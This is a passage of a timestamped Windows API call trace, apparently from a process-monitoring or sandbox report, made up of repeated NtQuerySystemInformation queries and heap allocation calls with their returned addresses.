ResultLength=0x0) [0200.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0200.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0201.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0201.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0201.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0201.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0201.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe4a0, Length=0x40, ResultLength=0x0) [0201.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0201.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe4a0, Length=0x40, ResultLength=0x0) [0201.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe3c0, Length=0x30, ResultLength=0x0) [0201.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0201.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe3c0, Length=0x30, ResultLength=0x0) [0201.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe2c8, Length=0x30, ResultLength=0x0) [0201.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe230, Length=0x38, ResultLength=0x0) [0201.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0201.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0201.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.605] GetProcessHeap () returned 0x27fc8db0000 [0206.605] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbdac0 [0206.605] GetProcessHeap () returned 0x27fc8db0000 [0206.605] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9b4b6c0 [0206.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.607] GetProcessHeap () returned 0x27fc8db0000 [0206.607] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8e5dc90 [0206.607] GetProcessHeap () returned 0x27fc8db0000 [0206.607] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9b71890 [0206.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.607] GetProcessHeap () returned 0x27fc8db0000 [0206.607] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd610 [0206.607] GetProcessHeap () returned 0x27fc8db0000 [0206.607] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9b48700 [0206.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd00, Length=0x50, ResultLength=0x0) [0206.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.612] GetProcessHeap () returned 0x27fc8db0000 [0206.612] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd520 [0206.612] GetProcessHeap () returned 0x27fc8db0000 [0206.612] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9b48de0 [0206.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.613] GetProcessHeap () returned 0x27fc8db0000 [0206.613] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9b4ec80 [0206.613] GetProcessHeap () returned 0x27fc8db0000 [0206.613] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9b72280 [0206.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.613] GetProcessHeap () returned 0x27fc8db0000 [0206.613] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbc9e0 [0206.613] GetProcessHeap () returned 0x27fc8db0000 [0206.614] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9b48f00 [0206.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd00, Length=0x50, ResultLength=0x0) [0206.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.620] GetProcessHeap () returned 0x27fc8db0000 [0206.620] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbcbc0 [0206.620] GetProcessHeap () returned 0x27fc8db0000 [0206.620] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9b48b60 [0206.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.621] GetProcessHeap () returned 0x27fc8db0000 [0206.621] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc994e820 [0206.621] GetProcessHeap () returned 0x27fc8db0000 [0206.621] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9b724c0 [0206.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.622] GetProcessHeap () returned 0x27fc8db0000 [0206.622] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd160 [0206.622] GetProcessHeap () returned 0x27fc8db0000 [0206.622] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9b48b80 [0206.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd70, Length=0x50, ResultLength=0x0) [0206.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.734] GetProcessHeap () returned 0x27fc8db0000 [0206.734] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbdd90 [0206.734] GetProcessHeap () returned 0x27fc8db0000 [0206.734] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9c1bc40 [0206.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.737] GetProcessHeap () returned 0x27fc8db0000 [0206.737] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8e97f30 [0206.737] GetProcessHeap () returned 0x27fc8db0000 [0206.737] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9b72910 [0206.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.738] GetProcessHeap () returned 0x27fc8db0000 [0206.738] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbc440 [0206.738] GetProcessHeap () returned 0x27fc8db0000 [0206.738] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9c1c180 [0206.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd70, Length=0x50, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.892] GetProcessHeap () returned 0x27fc8db0000 [0206.892] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbc9e0 [0206.892] GetProcessHeap () returned 0x27fc8db0000 [0206.892] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9cc1f60 [0206.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.895] GetProcessHeap () returned 0x27fc8db0000 [0206.895] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8e97f30 [0206.895] GetProcessHeap () returned 0x27fc8db0000 [0206.895] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9b74110 [0206.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.896] GetProcessHeap () returned 0x27fc8db0000 [0206.896] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbdd90 [0206.896] GetProcessHeap () returned 0x27fc8db0000 [0206.896] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9cc24c0 [0206.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd70, Length=0x50, ResultLength=0x0) [0206.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.910] GetProcessHeap () returned 0x27fc8db0000 [0206.910] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbce90 [0206.910] GetProcessHeap () returned 0x27fc8db0000 [0206.910] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9cc25c0 [0206.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.912] GetProcessHeap () returned 0x27fc8db0000 [0206.912] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8e97f30 [0206.912] GetProcessHeap () returned 0x27fc8db0000 [0206.912] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9b76f00 [0206.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.913] GetProcessHeap () returned 0x27fc8db0000 [0206.913] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbe060 [0206.913] GetProcessHeap () returned 0x27fc8db0000 [0206.913] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9cbf6e0 [0206.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd70, Length=0x50, ResultLength=0x0) [0206.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.929] GetProcessHeap () returned 0x27fc8db0000 [0206.929] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbc440 [0206.929] GetProcessHeap () returned 0x27fc8db0000 [0206.929] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9d5e610 [0206.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.198] GetProcessHeap () returned 0x27fc8db0000 [0207.198] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc8e97f30 [0207.198] GetProcessHeap () returned 0x27fc8db0000 [0207.198] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9d39370 [0207.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.198] GetProcessHeap () returned 0x27fc8db0000 [0207.198] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd610 [0207.198] GetProcessHeap () returned 0x27fc8db0000 [0207.198] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9d60370 [0207.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd70, Length=0x50, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.211] GetProcessHeap () returned 0x27fc8db0000 [0207.211] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbce90 [0207.211] GetProcessHeap () returned 0x27fc8db0000 [0207.212] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9d60430 [0207.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.214] GetProcessHeap () returned 0x27fc8db0000 [0207.214] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9d23b20 [0207.214] GetProcessHeap () returned 0x27fc8db0000 [0207.214] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9d351d0 [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.214] GetProcessHeap () returned 0x27fc8db0000 [0207.214] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbc9e0 [0207.214] GetProcessHeap () returned 0x27fc8db0000 [0207.214] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9d5d570 [0207.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd70, Length=0x50, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.567] GetProcessHeap () returned 0x27fc8db0000 [0207.567] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd160 [0207.567] GetProcessHeap () returned 0x27fc8db0000 [0207.567] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e34c50 [0207.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.618] GetProcessHeap () returned 0x27fc8db0000 [0207.618] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9d23b20 [0207.618] GetProcessHeap () returned 0x27fc8db0000 [0207.618] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9d356b0 [0207.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.619] GetProcessHeap () returned 0x27fc8db0000 [0207.619] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd700 [0207.619] GetProcessHeap () returned 0x27fc8db0000 [0207.619] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e34ef0 [0207.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.620] NtQuerySystemInformation (SystemInformationClass=0xb9, 